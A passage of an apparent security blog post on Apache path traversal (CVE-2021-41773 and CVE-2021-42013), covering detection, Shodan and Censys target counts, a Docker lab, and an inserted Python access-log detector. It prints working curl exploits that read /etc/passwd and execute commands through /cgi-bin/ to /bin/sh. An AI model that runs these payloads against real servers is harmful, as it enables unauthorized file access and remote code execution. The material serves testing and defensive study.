If the response code for any of the above endpoints is 403, the target application may be vulnerable. Keep in mind, however, that a 403 is not proof of vulnerability: a WAF can also produce a 403 response code.
On the other hand, if the response code for any of the above endpoints is 400 or 5XX, the application is most likely not vulnerable to this misconfiguration.
Another point to keep in mind while testing for this vulnerability is that it may exist even if the application does not have “/cgi-bin/” in its directory structure, since the vulnerability can be reproduced using other available aliases (e.g. /icons/).
The application must fulfil the following requirements for the Path Traversal vulnerability:
CVE-2021-41773:
CVE-2021-42013:
Apache has been one of the first choices that many organizations consider for hosting their applications on the internet. According to Netcraft’s Web Server Survey, nearly 25% of developers prefer Apache for hosting their work on the internet. This enormous presence of Apache servers makes Apache one of the prime targets for security researchers and malicious actors.
As discussed in the earlier section, not all of these instances are vulnerable, as there are some minimum requirements. However, at present, the number of instances running Apache 2.4.49 is enormous, and they are therefore being scanned at a very large scale by security researchers and bug hunters.
According to Censys.io, at the time of writing this blog post there are more than 18,000 active instances of Apache 2.4.49 that are possible targets for CVE-2021-41773 and more than 9,000 active instances of Apache 2.4.50 that can be tested for CVE-2021-42013:
Performing a similar search using the shodan.io vulnerability search engine yields more than 69,000 potential targets for CVE-2021-41773 and 13,500 possible targets for CVE-2021-42013 at the time of writing this post:
Shodan – Apache 2.4.49
Shodan – Apache 2.4.50
There are several ways to detect and exploit this vulnerability, some of which are as follows:
An Nmap script is available on GitHub that can be used to detect this vulnerability with the following Nmap command:
$ nmap --script http-vuln-cve2021-41773 -p
A specially crafted curl command can also be used to check whether a single target application is vulnerable to CVE-2021-41773 and CVE-2021-42013:
$ curl --silent --path-as-is --insecure "https://vulnerable.target/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd"
$ curl --silent --path-as-is --insecure "https://vulnerable.target/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd"
Nuclei vulnerability scanning templates are also available on GitHub (GitHub Nuclei Template – CVE-2021-41773 and GitHub Nuclei Template – CVE-2021-42013) for the identification and exploitation of CVE-2021-41773 and CVE-2021-42013 respectively. The Nuclei templates can be used for scanning a single target or for mass scanning of potential targets:
OWASP Nettacker is also effective in identifying CVE-2021-41773 and CVE-2021-42013. It can scan targets from a list, entire subnets, domains along with their subdomains, and IP ranges by running the commands shown in the screenshot below:
Vulnerability Detection using “nettacker.py” Script
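As an added defender-side example (not code from the original post), here is a Python routine that classifies web-server access-log entries by the traversal patterns shown in the curl commands above: it percent-decodes the request path repeatedly, so the single-encoded `.%2e` form of CVE-2021-41773 and the double-encoded `%%32%65` form of CVE-2021-42013 both normalise to `..`, then reports whether the request was a plain traversal or a POST into a CGI path (the Remote Code Execution shape used later in this post) and whether the server answered 200. The log lines are constructed for the example.

```python
import re
from urllib.parse import unquote
# Constructed Apache combined-format access-log lines (not from the original post).
SAMPLE_LOG = """\
10.0.0.5 - - [06/Oct/2021:10:00:01 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 200 1423 "-" "curl/7.74.0"
10.0.0.6 - - [06/Oct/2021:10:00:02 +0000] "GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1" 200 1423 "-" "curl/7.74.0"
10.0.0.7 - - [06/Oct/2021:10:00:03 +0000] "POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1" 200 38 "-" "curl/7.74.0"
10.0.0.8 - - [06/Oct/2021:10:00:04 +0000] "GET /icons/apache_pb.gif HTTP/1.1" 200 2326 "-" "Mozilla/5.0"
10.0.0.9 - - [06/Oct/2021:10:00:05 +0000] "GET /cgi-bin/../etc/passwd HTTP/1.1" 400 226 "-" "curl/7.74.0"
"""
# Method, request path and status code from a combined-format entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def fully_decode(path, max_rounds=3):
    """Percent-decode until stable: .%2e needs one round, the CVE-2021-42013 form
    %%32%65 needs two (%%32%65 -> %2e -> .), which a single-pass check misses."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def analyze_line(line):
    m = REQUEST_RE.search(line)
    if not m:
        return None
    raw = m.group("path")
    decoded = fully_decode(raw)
    has_dotdot = ".." in decoded.split("?", 1)[0].split("/")
    return {
        "raw": raw,
        "status": int(m.group("status")),
        "has_dotdot": has_dotdot,
        # Literal '..' is rejected by Apache's normaliser (400); the encoded forms are the bypass.
        "encoded": has_dotdot and raw != decoded,
        # POST to an aliased CGI path that walks out of it matches the /bin/sh RCE request.
        "cgi_post": m.group("method") == "POST" and decoded.startswith("/cgi-bin/") and has_dotdot,
    }

def find_suspicious(log_text):
    """Classify every dot-dot request: what was attempted and whether the server let it through."""
    hits = []
    for line in log_text.splitlines():
        info = analyze_line(line)
        if not info or not info["has_dotdot"]:
            continue
        kind = "rce-attempt" if info["cgi_post"] else "traversal-attempt"
        outcome = "succeeded" if info["status"] == 200 else "blocked"
        hits.append((info["raw"], f"{kind}-{outcome}", info["encoded"]))
    return hits
```

Feed it the relevant lines of your own access log with `find_suspicious(open(path).read())`; an encoded hit with outcome `succeeded` on a 2.4.49/2.4.50 host is the one worth escalating.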
Misconfiguration of the “apache2.conf” file can also lead to Remote Code Execution. If the configuration file “/etc/apache2/apache2.conf” contains “Require all granted” instead of “Require all denied” for the aliased paths, and CGI scripts are also enabled for those paths, an attacker can exploit the Path Traversal vulnerability to perform Remote Code Execution. The code snippets for the vulnerable and safe configurations are given below:
Vulnerable Configuration:
Safe Configuration:
This can be achieved using the following command:
$ curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; id' "http://[IP]:[Port]/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh"
For setting up the lab and the practical demonstration, we will use a Debian-based container image that is available on GitHub. This image can be used for testing and for chaining the vulnerability from Path Traversal to Remote Code Execution.
Execute the following commands on any *nix-based system:
$ git clone https://github.com/blasty/CVE-2021-41773
$ docker-compose build && docker-compose up || docker-compose-up
Setting Up with Docker
Please note down the container’s IP address and use it to perform the Path Traversal and Remote Code Execution steps.
Performing The Path Traversal Vulnerability:
$ curl -s --path-as-is "http://[IP]:[Port]/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
Exploiting File Path Traversal Vulnerability
Escalating The Path Traversal Vulnerability To Remote Code Execution:
To escalate the vulnerability to Remote Code Execution, use the following curl command:
$ curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; id' "http://[IP]:[Port]/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh"
Exploiting Remote Code Execution Vulnerability
As highlighted in the screenshot above, Remote Code Execution was not possible via the “/icons/” directory; “/cgi-bin/” must be used instead.
At the time of writing this post, one can follow the following techniques to safeguard against this vulnerability: